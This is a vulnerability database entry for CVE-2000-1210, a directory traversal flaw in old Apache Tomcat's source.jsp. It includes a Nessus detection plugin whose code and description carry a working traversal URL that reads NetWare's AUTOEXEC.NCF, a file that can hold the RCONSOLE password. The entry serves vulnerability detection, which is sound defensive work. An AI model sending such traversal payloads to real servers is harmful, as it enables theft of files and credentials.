Vulnerabilities > CVE-2000-1210 - Directory Traversal vulnerability in Apache Tomcat 1.1.3/3.0/3.1

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
apache
nessus

Summary

Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.

Vulnerable Configurations

Part Description Count
Application
Apache
4

Nessus

NASL familyNetware
NASL idNETWARE_TOMCAT_SOURCECODE_VIEWER.NASL
descriptionThe Apache Tomcat server distributed with NetWare 6.0 has a directory traversal vulnerability. As a result, sensitive information could be obtained from the NetWare server, such as the RCONSOLE password located in AUTOEXEC.NCF. Example : http://target/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf
last seen2020-06-01
modified2020-06-02
plugin id12119
published2004-03-30
reporterThis script is Copyright (C) 2004-2018 David Kyger
sourcehttps://www.tenable.com/plugins/nessus/12119
titleNovell NetWare 6.0 Tomcat source.jsp Traversal Arbitrary File Access
code
#
# This script was written by David Kyger <[email protected]>
#
# See the Nessus Scripts License for details
#

# Changes by Tenable:
# - Revised plugin title, added CVE, added solution, output formatting (9/3/09)


include("compat.inc");

if(description)
{
  script_id(12119);
  script_version ("1.15");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
  script_cve_id("CVE-2000-1210");

  script_name(english:"Novell NetWare 6.0 Tomcat source.jsp Traversal Arbitrary File Access");
 
 script_set_attribute(attribute:"synopsis", value:
"Sensitive data can be read on the remote data." );
 script_set_attribute(attribute:"description", value:
"The Apache Tomcat server distributed with NetWare 6.0 has a directory 
traversal vulnerability. As a result, sensitive information 
could be obtained from the NetWare server, such as the RCONSOLE 
password located in AUTOEXEC.NCF.

Example : 

http://target/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf" );
 script_set_attribute(attribute:"solution", value:
"Upgrade Tomcat to the latest version, or disable the service
if it is not required.
Remove default files from the web server. Also, ensure the RCONSOLE 
password is encrypted and utilize a password protected screensaver for 
console access." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");

 script_set_attribute(attribute:"plugin_publication_date", value: "2004/03/30");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/03/21");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/o:novell:netware");
script_set_attribute(attribute:"cpe",value:"cpe:/a:apache:tomcat");
script_end_attributes();

 script_summary(english:"Checks for the NetWare 6.0 Tomcat source code viewer vulnerability");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2004-2020 David Kyger");
 script_family(english:"Netware");
 script_dependencie("find_service1.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");

warning = "The content of the AUTOEXEC.NCF follows:";

url = "/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf";
 
port = get_http_port(default:80, embedded:TRUE);

if(get_port_state(port))
 {
   req = http_get(item:url, port:port);
   buf = http_keepalive_send_recv(port:port, data:req);
   if ("SYS:\" >< buf)
    {
     warning = warning + '\n'+ buf + '\n';
     security_hole(port:port, extra:warning);
    }
 }